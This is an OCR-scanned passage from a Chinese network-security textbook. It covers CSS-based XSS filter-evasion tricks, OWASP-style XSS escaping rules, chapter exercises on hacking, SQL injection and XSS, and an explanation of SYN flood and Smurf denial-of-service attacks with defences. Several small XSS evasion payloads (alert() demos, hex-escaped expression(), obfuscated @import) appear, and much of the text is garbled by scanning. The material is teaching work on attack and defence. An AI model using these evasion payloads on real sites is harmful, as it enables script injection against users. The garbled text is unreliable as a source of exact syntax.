expression 事件 

(2) 在 CSS 代码 中 加 入 JavaScript 和 VBScript 脚本 。 

fij 1: body{background-image:url(javascript:alert("xss"))} 

例 2: body background-image: url(vbscript : msgbox(" xss"))) 

(3) 转换 字符 类 型 ,以 十 六 进 制 字符 替换 其 中 部 分 或 全 部 的 字符 。 

例 1: @\0069mport:url(web/1. css) ;' // 将 其 中 的 i 转 为 \0069 

例 2: body{xss:\0065xpression(alert('xss'))}' // 将 e 转 换 为 \0065 

Bi 3: body background-image:N0075N0072N006c*** ) K url 全 转 为 十 六 进 制 

(4) 插入 混淆 字符 ,在 CSS 中 ,/ xx /是 块 注释 字符 ,可 注释 多 行 。 除 了 /*x /外 ,字符 
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“\” 和 结束 符 “\0” 也 可 作为 混淆 字符 。 
例 1: (à NOimVport NOjaVvascVript alert (" xss") ' s 等 价 于 : @import'javascript:alert 
€" xsst 2; 


例 2: @\i\0m\00p\0000\0000\00000r\000000t"url"; 等 价 于 : @import "url", 
6.11.7 XSS 攻击 的 预防 


CD. 从 网 站 开发 者 角度 .如何 防护 XSS 攻击 ? 

来 自 应 用 安全 国际 组 织 OWASP 的 建议 ,对 XSS 最 佳 的 防护 应 该 结合 以 下 两 种 方法 : 
验证 所 有 输入 数据 ,有 效 检测 攻击 ; 对 所 有 输出 数据 进行 适当 的 编码 ,以 防止 任何 已 成 功 注 
入 的 脚本 在 浏览 器 端 运行 ,具体 如 下 。 

输入 验证 : 某 个 数据 被 接受 为 可 被 显示 或 存储 之 前 ,使 用 标准 输入 验证 机 制 ,验证 所 有 
输入 数据 的 长 度 、 类 型 .语法 以 及 业务 规则 。 

输出 编码 : 数据 输出 前 ,确保 用 户 提 交 的 数据 已 被 正确 进行 entity 编码 ,建议 对 所 有 字 
符 进行 编码 而 不 仅 局 限于 某 个 子 集 。 

明确 指定 输出 的 编码 方式 : 不 要 允许 攻击 者 为 用 户 选 择 编码 方式 (如 ISO 8859-1 或 
UTF-8), 

注意 黑 名 单 验证 方式 的 局 限 性 : 仅 查 找 或 蔡 换 一 些 字 符 ( 如 "过 “二 ?或 类 似 “script” 
的 关键 字 ) ,很 容易 被 XSS 变种 攻击 绕 过 验证 机 制 。 

警惕 规范 化 错误 : 验证 输入 之 前 ,必须 进行 解码 及 规范 化 以 符合 应 用 程序 当前 的 内 部 
表示 方法 。 请 确定 应 用 程序 对 同一 输入 不 做 两 次 解码 。 

(2) 从 网 站 用 户 角 度 , 如 何 防护 XSS 攻击 ? 

当 你 打开 一 封 E-mail 或 附件 ,浏览 论坛 帖子 时 ,可 能 恶意 脚本 会 自动 执行 ,因此 ,在 做 
这 些 操作 时 一 定 要 特别 谨慎 。 建 议 在 浏览 器 设置 中 关闭 JavaScript。 如 果 使 用 IE 浏览 器 ， 
将 安全 级 别 设置 到 “高 "?。 具 体 可 以 参照 浏览 器 安全 的 相关 文章 。 

这 里 需要 再 次 提醒 的 是 ,XSS 攻击 其 实 伴随 着 社会 工程 学 的 成 功 应 用 ,需要 增强 安全 
意识 ,只 信任 值得 信任 的 站 点 或 内 容 。 可 以 通过 一 些 检测 工具 进行 XSS 的 漏洞 检测 ,类 似 
工具 有 亿 思 网 站 安全 检测 平台 。 针 对 XSS 的 漏洞 带 来 的 危害 是 巨大 的 ,如 有 发 现 ,应 立即 
修复 漏洞 。 


6.11.8 XSS 的 防御 规则 


下 列 规则 旨 在 防止 所 有 发 生 在 应 用 程序 中 的 XSS 攻击 ,虽然 这 些 规则 不 允许 任意 向 
HTML 文档 放 和 人 不 可 信 数 据 , 不 过 基本 上 也 涵盖 了 绝 大 多 数 常见 的 情况 。 不 需要 采用 所 有 
规则 ,很 多 企业 可 能 会 发 现 第 一 条 和 第 二 条 就 已 经 足以 满足 需求 了 。 请 根据 自己 的 需求 选 
择 规 则 。 

1. 不 要 在 允许 位 置 插入 不 可 信和 数据 

第 一 条 规则 就 是 拒绝 所 有 数据 ,不 要 将 不 可 信 数 据 放 入 HTML 文档 ,除非 是 下 列 定义 
的 插 槽 。 这 样 做 的 理由 是 在 有 解码 规则 的 HTML 中 有 很 多 奇怪 的 context, 让 事情 变 得 很 
复杂 ,因此 没有 理由 将 不 可 信 数 据 放 在 这 些 context 中 。 
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< script >...NEVERPUTUNTRUSTEDDATAHERE...</script > 

<! —— ...NEVERPUTUNTRUSTEDDATAHERE... 一 一 > 

< div. ..NEVERPUTUNTRUSTEDDATAHERE. .. = test/> 

<. ..NEVERPUTUNTRUSTEDDATAHERE. ..href = "/test" /> 

更 重要 的 是 ,不 要 接受 来 自 不 可 信任 来 源 的 JavaScript 代码 然后 运行 ,例如 ,名 为 
“callback” 的 参数 就 包含 JavaScript 代码 段 , 没 有 解码 能 够 解决 。 

2. 在 向 HTML 元 素 内 容 插入 不 可 信 数 据 前 对 HTML 解码 

这 条 规则 适用 于 当 你 想 把 不 可 信 数 据 直 接 插入 HTML 正文 某 处 时 ,这 包括 内 部 正常 
RÆ Cdiv p b td 等 )。 大 多 数 网 站 框架 都 有 HTML 解码 的 方法 且 能 够 躲 开 下 列 字 符 。 但 
是 ,这 对 于 其 他 HTML context 是 远 远 不 够 的 ,需要 部 署 其 他 规则 。 

< body »...ESCAPEUNTRUSTEDDATABEFOREPUTTINGHERE... </body > 

< div »...ESCAPEUNTRUSTEDDATABEFOREPUTTINGHERE...«/div > 

AEH HTML 实体 解码 躲 开 下 列 字符 以 避免 切换 到 任何 执行 内 容 , 如 脚本 、 样 式 或 者 
事件 处 理 程序 。 在 这 种 规格 中 推荐 使 用 十 六 进 制 实体 ,除了 XML 中 5 个 重要 字符 (& 一、 
之 “0D 外 ,还 加 入 了 斜 线 符 , 以 帮助 结束 HTML 实体 。 


&-->& 
«--»« 
>-->> 


"=>" 
'-- »'&apos; isnotrecommended 
/ -- »/forwardslashisincludedasithelpsendanHTMLentity 


3. 在 向 HTML 常见 属性 插入 不 可 信 数 据 前 进行 属性 解码 

这 条 规则 是 将 不 可 信 数 据 转化 为 典型 属性 值 ( 如 宽度 名 称 、 值 等 ) ,这 不 能 用 于 复杂 属 
性 (如 href sre style 或 者 其 他 事件 处 理 程序 ) 。 这 是 极其 重要 的 规则 ,事件 处 理 器 属性 (为 
HTML JavaScript Data Values) 必 须 遵守 该 规则 。 

< divattr = ...ESCAPEUNTRUSTEDDATABEFOREPUTTINGHERE...» content </div> 

< divattr = '...ESCAPEUNTRUSTEDDATABEFOREPUTTINGHERE...'» content </div > 

< divattr = "...ESCAPEUNTRUSTEDDATABEFOREPUTTINGHERE..."» content </div> 

除了 字母 数字 字符 外 ,使 用 小 于 256 的 ASCI 值 85 xHH 格式 (或 者 命名 的 实体 ) 对 
所 有 数据 进行 解码 以 防止 切换 属性 。 这 条 规则 应 用 广泛 的 原因 是 因为 开发 者 常常 让 属性 保 
持 未 引用 ,正确 引用 的 属性 只 能 使 用 相应 的 引用 进行 解码 。 未 引用 属性 可 以 被 很 多 字符 破 
坏 , 包 括 Lspace] 6 * 十 ,一 /; 扫 = 一 >^ 和 |。 

4. 在 向 HTML JavaScript Data Values 插入 不 可 信 数 据 前 ,进行 JavaScript 解码 

这 条 规则 涉及 在 不 同 HTML 元 素 上 制定 的 JavaScript 事件 处 理 器 。 向 这 些 事件 处 理 
器 放置 不 可 信 数 据 的 唯一 安全 位 置 就 是 “data value”。 在 这 些小 代码 块 放 置 不 可 信 数 据 是 
相当 危险 的 ,因为 很 容易 切换 到 执行 环境 ,因此 请 小 心 使 用 。 

< script» alert('...ESCAPEUNTRUSTEDDATABEFOREPUTTINGHERE...')</script > 


< script» x = ...ESCAPEUNTRUSTEDDATABEFOREPUTTINGHERE. ..</script > 
< divonmouseover = ...ESCAPEUNTRUSTEDDATABEFOREPUTTINGHERE. ..</div > 
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< divonmouseover = '...ESCAPEUNTRUSTEDDATABEFOREPUTTINGHERE... «/div > 
< divonmouseover = "...ESCAPEUNTRUSTEDDATABEFOREPUTTINGHERE..."«/div > 


除了 字母 数字 字符 外 ,使 用 小 于 256 的 ASCI f xHH( 十 六 进 制 ) 格 式 对 所 有 数据 进 
行 解 码 以 防止 将 数据 值 切 换 至 脚本 内 容 或 者 另 一 属性 。 不 要 使 用 任何 解码 捷径 (如 ") ,因为 
引用 字符 可 能 被 先 运行 的 HTML 属性 解析 器 相 匹 配 。 如 果 事件 处 理 器 被 引用 , 则 需要 相 
应 的 引用 来 解码 。 这 条 规则 的 广泛 应 用 是 因为 开发 者 经 常 让 事件 处 理 器 保持 未 引用 。 正 确 
引用 属性 只 能 使 用 相应 的 引用 来 解码 ,未 引用 属性 可 以 使 用 任何 字符 (包括 [space]、%、* 、 
Tas ss RUSSIE R, h HTML 解析 器 比 JavaScript 解析 器 先 运行 ， 
关闭 标签 能 够 关闭 脚本 块 , 即 使 脚本 块 位 于 引用 字符 串 中 。 

5. 在 向 HTML 样式 属性 值 插入 不 可 信 数 据 前 ,进行 CSS 解码 

当 你 想 将 不 可 信 数 据 放 和 人 样式 表 或 者 样式 标签 时 ,可 以 用 此 规则 。CSS 是 很 强大 的 ， 
可 以 用 于 许多 攻击 。 因 此 ,只 能 在 属性 值 中 使 用 不 可 信 数 据 而 不 能 在 其 他 样式 数据 中 使 用 。 
不 能 将 不 可 信 数 据 放 人 复杂 的 属性 (如 url, behavior 和 custom (-moz-binding))。 同 样 ,不 
能 将 不 可 信 数 据 放 人 人 允许 JavaScript 的 IE 的 expression 属性 值 。 

除了 字母 数字 字符 外 ,使 用 小 于 256 的 ASCI 值 \HH 格式 对 所 有 数据 进行 解码 。 不 
要 使 用 任何 解码 捷径 (如 "), 因 为 引用 字符 可 能 被 先 运行 的 HTML 属性 解析 器 所 匹配 , 防 
止 将 数据 值 切换 至 脚本 内 容 或 者 男 一 属性 。 同 时 防止 切换 至 expression 或 者 其 他 允许 脚本 
的 属性 值 。 如 果 属 性 被 引用 ,将 需要 相应 的 引用 进行 解码 ,所 有 的 属性 都 应 该 被 引用 。 未 引 
用 属性 可 以 使 用 任何 字符 (包括 [space]、%、* Fm ass mV SV, mr. 
由 于 HTML 解析 器 比 JavaScript 解析 器 先 运 行 ,二 /script 二 标签 能 够 关闭 脚本 块 ,即使 脚 
本 块 位 于 引用 字符 串 中 。 

6. 在 向 HTML URL 属性 插入 不 可 信 数 据 前 ,进行 URL 解码 

当 你 想 将 不 可 信 数 据 放 人 链接 到 其 他 位 置 的 link. 中 时 需要 运用 此 规则 。 这 包括 href 
和 src 属性 。 还 有 很 多 其 他 位 置 属 性 ,不 过 建议 不 要 在 这 些 属 性 中 使 用 不 可 信 数 据 。 需 要 
注意 的 是 ,在 JavaScript 中 使 用 不 可 信 数 据 的 问题 ,不 过 可 以 使 用 上 述 的 HTML JavaScript 
Data Value 规则 。 

< ahref = http: //...ESCAPEUNTRUSTEDDATABEFOREPUTTINGHERE...» link </a > 


< imgsrc = 'http: //...ESCAPEUNTRUSTEDDATABEFOREPUTTINGHERE...'/^ 
< scriptsrc = "http://...ESCAPEUNTRUSTEDDATABEFOREPUTTINGHERE..."/» 


除了 字母 数字 字符 外 ,使 用 小 于 256 的 ASCI 值 %HH 解码 格式 对 所 有 数据 进行 解 
码 。 在 数据 中 保护 不 可 信 数 据 : URL 不 能 够 被 允许 ,因为 没有 好 方法 来 通过 解码 来 切换 
URL 以 避免 攻击 。 所 有 的 属性 都 应 该 被 引用 。 未 引用 属性 可 以 使 用 任何 字符 (包括 
[Lspacej、%、* 、 十 、、 一 人 ;二 一、 二 |) 解码 ,请 注意 实体 编码 在 这 方面 是 无 用 的 。 


J — 


一 、 填 空 题 
1. 黑客 攻击 5 部 曲 : < ` ` 
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—op 


2. 
3. 


. 社会 工程 学 攻击 主要 包括 两 种 方式 : 

. Mimikatz 工具 软件 的 主要 功能 是 ° 

. 网 络 入 侵 威胁 分 为 三 类 : " 

. 一 次 字典 攻击 能 否 成 功 ,很 大 因素 决定 于 " 

. XSS 攻击 分 为 两 类 
、 选 择 题 

. 下 面 哪些 不 是 SQL 注入 产生 的 原因 ? ( ) 


A. 不 安全 的 数据 库 配 置 B. 不 合理 的 查询 集 处 理 
C. 不 当 的 类 型 处 理 D. 操作 系统 配置 不 合理 


. 下 列 有 关 SQL 注入 说 明 最 合适 的 是 ( D. 


A. 构建 特殊 的 参数 传递 给 操作 系统 变量 
B. 构建 特殊 的 SQL 语句 输入 给 服务 器 

C. 构建 特殊 的 参数 输入 给 Web 应 用 程序 
D. 构建 特殊 的 参数 直接 输入 给 SQL 服务 器 


. X XSS 攻击 说 明正 确 的 是 ( )。 


A. 攻击 者 通过 攻击 Web 页 面 插入 恶意 HTML 代码 , 当 用 户 浏览 时 恶意 代码 便 会 
被 执行 

B. 设计 者 通过 在 网 页 内 写 和 人 恶意 脚本 , 当 用 户 运行 时 窃取 用 户 的 信息 

C. 只 要 过 滤 掉 JavaScript 关键 字符 ,就 能 防止 XSS 攻击 

D. XSS 攻击 是 无 法 防御 的 


、 简 答题 


简 述 社会 工程 学 攻击 的 原理 。 
简 述 缓冲 区 溢出 攻击 的 原理 。 
请 利用 AND 或 OR 规则 书写 一 段 可 用 作 SQL 注入 的 语句 。 
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学 习 目 标 : 
m 掌握 SYN 风暴 和 Smurf 攻击 。 
m 7# DDoS 攻击 。 


凡是 造成 目标 计算 机 拒绝 提供 服务 的 攻击 都 被 称 为 拒绝 服务 (Denial of Service,DoS) 
攻击 ,其 目的 是 使 目标 计算 机 或 网 络 无 法 提供 正常 的 服务 。 最 常见 的 DoS 攻击 是 计算 机 网 
络 带宽 攻击 和 连通 性 攻击 。 

带宽 攻击 是 以 极 大 的 通信 量 冲 击 网 络 ,使 网 络 所 有 可 用 带宽 都 被 消耗 掉 , 最 后 导致 合法 
用 户 的 请 求 无 法 通过 。 

连通 性 攻击 是 指 用 大 量 的 连接 请 求 冲击 计算 机 ,最 终 导致 计算 机 无 法 再 处 理 合法 用 户 
的 请 求 。 一 个 最 贴切 的 例子 就 是 : 有 成 百 上 千 的 人 给 同一 个 电话 打 电 话 , 这 样 其 他 用 户 就 
再 也 打 不 进 电话 了 ,这 就 是 连通 性 DoS 攻击 。 


7.1 SYN 风暴 


1996 4E 9 月 以 来 ,许多 Internet 站 点 遭受 了 一 种 称 为 SYN 风暴 (SYN Flooding) fl] JE. 
绝 服务 攻击 。 它 是 通过 创建 大 量 * 半 连接 ?来 进行 攻击 。 任 何 连接 到 Internet. 上 并 提供 基于 
TCP 的 网 络 服务 (如 WWW 服务 ,FTP 服务 ,邮件 服务 等 ) 的 主机 都 可 能 遭受 这 种 攻击 。 

针对 不 同系 统 , 攻 击 的 结果 可 能 不 同 ,但 是 攻击 的 根本 都 是 利用 这 些 系统 中 TCP/IP 族 
的 设计 和 缺陷 。 只 有 对 现 有 TCP/IP 族 进行 重大 改变 才能 修正 这 些 缺 陷 。 目 前 还 没有 一 个 
完整 的 解决 方案 ,但 是 可 以 采取 一 些 措施 尽量 降低 这 种 攻击 发 生 的 可 能 性 , 减 小 损失 。 


7.1.1 SYN 风暴 背景 介绍 


IP 协议 是 Internet 网 络 层 的 标准 协议 ,提供 了 不 可 靠 的 .无 连接 的 网 络 分 组 传输 服务 。 
IP 协议 的 基本 数据 传输 单元 称 为 网 络 包 。 

所 谓 的 “不 可 靠 是 指 不 保证 数据 报 在 传输 过 程 中 的 可 靠 性 和 正确 性 , 即 数据 报 可 能 丢 
失 , 可 能 重复 ,可 能 延迟 ,也 可 能 被 打 乱 次 序 。 

所 谓 * 无 连接 ?是 指 传输 数据 报 之 前 不 建立 虚 电 路 ,每 个 包 都 可 能 经 过 不 同 路 径 传输 ,其 
中 有 些 包 可 能 会 丢失 。 

TCP 位 于 IP 协议 和 应 用 层 协 议 之 间 ,提供 了 可 靠 的 \ 面 向 连接 数据 流传 输 服 务 。TCP 
可 以 保证 通信 双方 的 数据 报 能 够 按 序 无 误 传输 ,不 会 发 生出 错 、 丢 失 、 重 复 、 乱 序 的 现象 。 
TCP 通过 流 控制 机 制 (如 滑动 窗口 协议 ) 和 重 传 等 技术 来 实现 可 靠 的 数据 报 传输 。 

SYN 攻击 属于 DoS 攻击 的 一 种 , 它 利用 TCP 缺陷 ,通过 发 送 大 量 的 半 连 接 请 求 , 耗 
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费 CPU 和 内 存 资源 。SYN 攻击 除了 能 影响 主机 外 ,还 可 以 危害 路 由 器 、 防 火 墙 等 网 络 系 
统 ,事实 上 SYN 攻击 并 不 在 乎 目标 是 什么 系统 ,只 要 这 些 系 统 打 开 TCP 服务 就 可 以 
实施 。 


7.1.2 SYN 原理 


在 SYN Flood 攻击 中 ,利用 TCP 三 次 握手 协议 的 缺陷 ,攻击 者 向 目标 主机 发 送 大 量 伪 
造 源 地 址 的 TCP SYN 报 文 ,目标 主机 分 配 必要 的 资源 ,然后 向 源 地 址 返回 SYN 十 ACK 包 ， 
并 等 待 源 端 返回 ACK 包 。 由 于 源 地 址 是 伪造 的 ,所 以 源 端 永远 都 不 会 返回 ACK 报 文 , 受 
害 主机 继续 发 送 SYN-- ACK 包 , 并 将 半 连 接 放 和 人 端口 的 积压 队列 中 ,虽然 一 般 的 主机 都 有 
超时 机 制 和 默认 的 重 传 次 数 ,但 由 于 端口 的 半 连 接 队 列 的 长 度 是 有 限 的 ,如 果 不 断 地 向 受害 
主机 发 送 大量 的 TCP SYN 报 文 , 半 连接 队列 很 快 就 会 填 满 ,服务 器 拒绝 新 的 连接 ,将 导致 
该 端口 无 法 响应 其 他 机 器 进行 的 连接 请 求 ,最 终 使 受害 主机 的 资源 耗 尽 。 

握手 的 第 一 个 报 文 段 的 码 元 字段 的 SYN 被 置 1。 第 二 个 报 文 的 SYN 和 ACK 均 被 置 
1 ,指出 这 时 对 第 一 个 SYN 报 文 段 的 确认 并 继续 握手 操作 。 最 后 一 个 报 文 仅仅 是 一 个 确认 
信息 ,通知 目的 主机 已 成 功 建立 了 双方 所 同意 的 这 个 连接 。 

针对 每 个 连接 ,连接 双方 都 要 为 该 连接 分 配 以 下 内 存 资源 。 

A) Socket( 套 接 字 ) 结 构 , 描 述 所 使 用 的 协议 ,状态 信息 ,地 址 信息 ,连接 队列 ,缓冲 区 
和 其 他 标志 位 等 。 

(2) Internet 协议 控制 块 结构 (Inpcb) ,描述 TCP 状态 信息 ,IP 地 址 ,端口 号 ,IP 头 原 
型 ,目标 地 址 ,其 他 选项 等 。 

G) TCP 控制 块 结构 (TCPcb) ,描述 时 钟 信息 ,序列 号 , 流 控制 信息 , 带 外 数据 等 。 

一 般 情况 下 ,为 每 个 连接 分 配 的 这 些 内 存单 元 的 大 小 都 会 超过 280B。 

当 接收 端 收 到 连接 请 求 的 SYN 包 时 ,就 会 为 该 连接 分 配 上 面 提 到 的 数据 结构 ,因此 只 
能 有 有 限 个 连接 处 于 半 连 接 状 态 ( 称 为 SYN- RECVD 状态 ) ,系统 会 为 过 多 的 半 连 接 而 耗 
尽 内 存 资源 ,进而 拒绝 为 合法 用 户 提供 服务 。 当 半 连 接 数 达到 最 大 值 时 ,TCP 就 会 丢弃 所 
有 后 续 的 连接 请 求 , 此 时 用 户 的 合法 连接 请 求 也 会 被 拒绝 。 但 是 ,受害 主机 的 所 有 外 出 连接 
请 求 和 所 有 已 经 建立 好 的 连接 将 不 会 受到 影响 。 这 种 状况 会 持续 到 半 连 接 超时 ,或 某 些 连 
接 被 重 置 或 释放 。 

如 果 攻 击 者 盗用 的 是 某 台 可 达 主 机 XX 的 IP 地 址 ,由 于 主机 X 没 有 向 主机 D 发 送 连接 
请 求 , 所 以 当 它 收 到 来 自 D 的 SYN 十 ACK 包 时 ,会 向 DD 发 送 RST 包 ,主机 DD 会 将 该 连接 
EE. 

而 攻击 者 通常 伪造 主机 D 不 可 达 的 IP 地 址 作为 源 地 址 。 为 了 使 拒绝 服务 的 时 间 长 于 
超时 所 用 的 时 间 ,攻击 者 会 持续 不 断 地 发 送 SYN 包 , 所 以 称 为 “SYN 风暴 ”。 


7.1.3. 防范 措施 


1. 优化 系统 配置 

缩短 超时 时 间 ,使 得 无 效 的 半 连 接 能 够 尽快 释放 ,但 是 可 能 会 导致 超过 该 阔 值 的 合法 连 
接 失 效 。 增 加 半 连 接 队列 的 长 度 , 使 得 系统 能 够 同时 处 理 更 多 的 半 连 接 。 关 闭 不 重要 的 服 
务 , 减 小 被 攻击 的 可 能 。 
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2. 优化 路 由 器 配置 

配置 路 由 器 的 外 网 卡 ,丢弃 那些 来 自 外 部 网 而 源 IP 地 址 具有 内 部 网 络 地 址 的 包 。 

配置 路 由 器 的 内 网 卡 ,丢弃 那些 即将 发 到 外 部 网 而 源 IP 地 址 不 具有 内 部 网 络 地 址 的 
包 : 这 种 方法 不 能 完全 杜绝 SYN 风暴 攻击 ,但 是 能 够 有 效 地 减少 攻击 的 可 能 ,特别 是 当 全 
球 的 ISP 都 正确 合理 地 配置 他 们 的 路 由 器 的 时 候 。 特 别 需 要 强调 的 是 ,优化 路 由 器 配置 对 
几乎 所 有 伪造 源 地 址 的 拒绝 服务 攻击 都 能 进行 有 效 的 限制 , 减 小 攻击 的 可 能 。 

3. 完善 基础 设施 

现 有 的 网 络 体系 结构 没有 对 源 TP 地 址 进行 检查 的 机 制 , 同 时 也 不 具备 追踪 网 络 包 的 物 
理 传输 路 径 的 机 制 ,使 得 发 现 并 惩治 作恶 者 很 困难 。 而 且 很 多 攻击 手段 都 是 利用 现 有 网 络 
协议 的 缺陷 ,因此 ,对 整个 网 络 体系 结构 的 再 改造 十 分 重要 。 

4. 使 用 防火 墙 

现在 多 厂商 的 防火 墙 产 品 实现 了 半 透 明 网 关 技 术 , 能 够 有 效 地 防范 SYN 风暴 攻击 , 同 
时 保证 了 很 好 的 性 能 。 

5. 主动 监视 

即 在 网 络 的 关键 点 上 安装 监视 软件 ,这 些 软 件 持续 监视 TCP/IP 流量 ,收集 通信 控制 信 
息 , 分 析 通 信 状 态 , 辨 别 攻击 行为 ,并 及 时 做 出 反应 。 


7.2 Smurf 攻击 


Smurf 攻击 是 以 最 初 发 动 这 种 攻击 的 程序 Smurf 来 命名 的 。 这 种 攻击 方法 结合 使 用 
了 IP 欺骗 和 带 有 广播 地 址 的 ICMP( 互 联网 控制 消息 协议 ) 请 求 -响应 方法 使 大 量 网 络 传 
输 充斥 目标 系统 ,引起 目标 系统 拒绝 为 正常 系统 进行 服务 ,属于 间接 、 借 力 攻击 方式 。 任 
何 连接 到 互联 网 上 的 主机 或 其 他 支持 ICMP 请 求 -响应 的 网 络 设备 都 可 能 成 为 这 种 攻击 
的 目标 。 


7.2.1 攻击 手段 


ICMP 用 来 传达 状态 信息 和 错误 信息 (如 网 络 拥塞 指示 等 网 络 传输 问题 ), 并 交换 控制 
信息 。 同 时 ICMP 还 是 诊断 主机 或 网 络 问题 的 有 用 工具 。 可 以 使 用 ICMP 判断 某 台 主机 是 
和 否 可 达 , 通 常 以 ping 命令 实现 ,许多 操作 系统 和 网 络 软件 包 都 包含 该 命令 。 即 向 目标 主机 
D 发 送 ICMP echo 请 求 包 ,如 果 D 收 到 该 请 求 包 ,会 发 送 echo 响应 包 作为 回答 。 


7.2.2 原理 


Smurf 是 一 种 很 古老 的 DoS 攻击 。 这 种 方法 使 用 了 广播 地 址 ,广播 地 址 的 尾数 通常 为 
0, 比 如 192.168.1.0。 在 一 个 有 N 台 计 算 机 的 网 络 中 , 当 其 中 一 台 主 机 向 广播 地 址 发 送 了 
1KB 大 小 的 ICMP Echo Requst 时 ,那么 它 将 收 到 N KB 大 小 的 ICMP Reply, 如 果 N 足够 
大 , 它 将 淹没 该 主机 ,最 终 导致 该 网 络 的 所 有 主机 都 对 此 ICMP Echo Requst 做 出 答复 ,使 
网 络 阻塞 。 利 用 此 攻击 时 ,假冒 受害 主机 的 IP, 那 么 它 就 会 收 到 应 答 , 形 成 一 次 拒绝 服务 攻 
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击 。Smurf 攻击 的 流量 比 Ping of death 洪水 的 流量 高 出 一 两 个 数量 级 ,而 且 更 加 隐藏 。 
7.2.3 攻击 行为 的 元 素 


Smurf 攻击 行为 的 完成 涉及 三 个 元 素 : 攻击 者 (Attacker) ,中 间 脆 弱 网 络 (Intermeiary) 
和 目标 受害 者 (Victim)。 

攻击 者 伪造 一 个 ICMP echo 应 答 请 求 包 ,其 源 地 址 为 目标 受害 者 地 址 ,目的 地 址 为 中 
间 脆 弱 网 络 的 广播 地 址 ,并 将 该 echo 请 求 包 发送 到 中 间 脆 弱 网 络 。 

中 间 上 脆弱 网 络 中 的 主机 收 到 这 个 ICMP echo 请 求 包 时 ,会 以 echo 响应 包 作 为 回答 ,而 
这 些 包 最 终 被 发 送 到 目标 受害 者 。 这 样 ,大量 同时 返回 的 echo 响应 数据 包 将 造成 目标 网 络 
严重 拥塞 、 丢 包 , 甚 至 完全 不 可 用 等 现象 。 

尽管 中 间 脆 弱 网 络 ( 又 称 反弹 站 点 ,Bounce-Sites) 没 有 被 称 为 受害 者 ,但 实际 上 中 间 网 
络 同样 为 受害 方 ,其 性 能 也 遭受 严重 影响 。 黑 客 通 常 首先 在 全 网 范围 内 搜索 不 过 滤 广 播 包 
的 路 由 器 并 急剧 放大 网 络 流量 。Smurf 攻击 的 一 个 直接 变种 称 为 Fraggle, 两 者 的 不 同 点 在 
于 后 者 使 用 的 是 UDP echo 包 , 而 不 是 ICMP echo f. 


7.2.4 分 析 


假设 攻击 者 位 于 带宽 为 T. 的 网 中 ,使 用 一 半 的 带宽 (768kb/s) 发 送 伪造 的 echo 请 求 包 
到 带宽 为 Ts 的 中 间 网 络 Bl 和 B2; 假设 Bl 中 有 80 台 主 机 ,B2 中 有 100 台 主 机 ,那么 B 将 
会 产生 384kb/sX 80—30Mb/s 的 外 出 流量 ,B2 HATE (384kb/sX 100) —37. 5Mb/s 的 外 
出 流量 ; 此 时 目标 受害 者 将 承受 30Mb/s 十 37. 5Mb/s— 67. 5Mb/s 的 冲击 。 

可 见 中 间 网 络 起 到 一 个 放大 器 的 作用 。 攻 击发 生 时 ,不 论 是 子 网 内 部 还 是 面向 
Internet 的 连接 ,中 间 网 络 和 目标 受害 主机 所 在 的 网 络 性 能 都 会 急剧 下 降 , 直 到 网 络 不 可 
用 。 这 种 攻击 与 ping flooding 和 UDP flooding 的 原理 相似 , 正 是 这 种 流量 放大 功能 ,使 得 
它 具 有 更 强 的 攻击 力 。 同 样 ,对抗 这 类 攻击 应 该 从 以 下 三 方面 和 人手。 所 以 ,网 络 攻 击 会 发 动 
网 络 上 大 量 的 结 点 成 为 攻击 的 协同 者 ,这 是 网 络 攻击 的 最 可 怕 之 处 ,如 图 7-1 所 示 。 

第 一 步 ， 攻 击 者 利用 网 络 A 的 广播 地 址 发 送 一 个 
ICMP 的 echo 请 求 数据 报 ， 该 数据 报 源 地 址 被 伪 


造成 210.25.82.79 
被 利用 的 网 络 A : 10.24.5.0 


攻击 者 网 络 一 Rc 
110.24.38.0 ^^ E 
7 R 
[I D 


被 攻击 的 网 络 : 
210.25.82.79 第 二 步 ， 网 络 A 上 的 所 有 主机 都 向 该 伪造 
的 地 址 返回 响应 ， 该 主机 服务 中 断 。 


图 7-1 Smurf 攻击 过 程 
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1. 针对 中 间 网 络 : 配置 路 由 器 禁止 IP 广播 包 进 网 

在 路 由 器 的 每 个 端口 关闭 IP 广播 包 的 转发 设置 ; 在 可 能 的 情况 下 ,在 网 络 边界 处 使 用 
访问 控制 列表 (Acess Control Lisr, ACL) ,过 滤 掉 所 有 目标 地 址 为 本 网 络 广播 地 址 的 包 ( 不 
充当 中 间 网 络 ); 对 于 不 提供 穿 透 服务 的 网 络 , 可 以 在 出 口 路 由 器 上 过 滤 掉 所 有 源 地 址 不 是 
本 网 地 址 的 数据 包 ; 配置 主机 的 操作 系统 ,使 其 不 响应 带 有 广播 地 址 的 ICMP 包 。 

2. 针对 目标 受害 者 

没有 什么 简单 的 解决 方法 能 够 帮助 受害 主机 , 当 攻击 发 生 时 ,应 尽快 重新 配置 其 所 在 网 
络 的 路 由 器 ,以 阻塞 这 些 ICMP 响应 包 。 但 是 受害 主机 的 路 由 器 和 受害 主机 ISP 之 间 的 拥 
塞 不 可 避免 。 同 时 ,也 可 以 通知 中 间 网 络 的 管理 者 协同 解决 攻击 事件 ,被 攻击 目标 与 ISP 协 
商 ,由 ISP 暂时 阻止 这 些 流 量 。 

3. 针对 发 起 攻击 的 主机 及 其 网 络 

Smurf 攻击 通常 会 使 用 欺骗 性 源 地 址 发 送 echo 请 求 , 因 此 在 路 由 器 上 配置 其 过 滤 规 
则 ,丢弃 那些 即将 发 到 外 部 网 而 源 IP 地 址 不 具有 内 部 网 络 地 址 的 包 。 这 种 方法 尽管 不 能 消 
K IP 欺骗 的 包 , 却 能 有 效 降低 攻击 发 生 的 可 能 性 。 


7.3. 利用 处 理 程序 错误 进行 攻击 


SYN flooding 和 Smurf 攻击 利用 TCP/IP 中 的 设计 弱点 ,通过 强行 引入 大 量 的 网 络 包 
来 占用 带宽 ,迫使 目标 受害 主机 拒绝 对 正常 的 服务 请 求 进行 响应 。 利 用 TCP/IP 实现 中 的 
处 理 程序 错误 进行 攻击 , 即 故意 错误 地 设 定数 据 包 头 的 一 些 重 要 字段 ,将 这 些 错 误 的 IP 数 
据 包 发 送出 去 。 

在 接收 数据 端 ,服务 程序 通常 都 存在 一 些 问题 ,因而 在 将 接收 到 的 数据 包 组 装 成 一 个 完 
整 的 数据 包 的 过 程 中 ,就 会 使 系统 宕 机 、 挂 起 或 崩溃 ,从 而 无 法 继续 提供 服务 。 这 些 攻击 包 
括 广为人知 的 Ping of Death. 当前 十 分 流行 的 Teardrop 攻击 和 Land 攻击 ,Bonk 攻击 ， 
Boink 攻击 及 OOB 攻击 等 。 

1. Ping of Death 攻击 

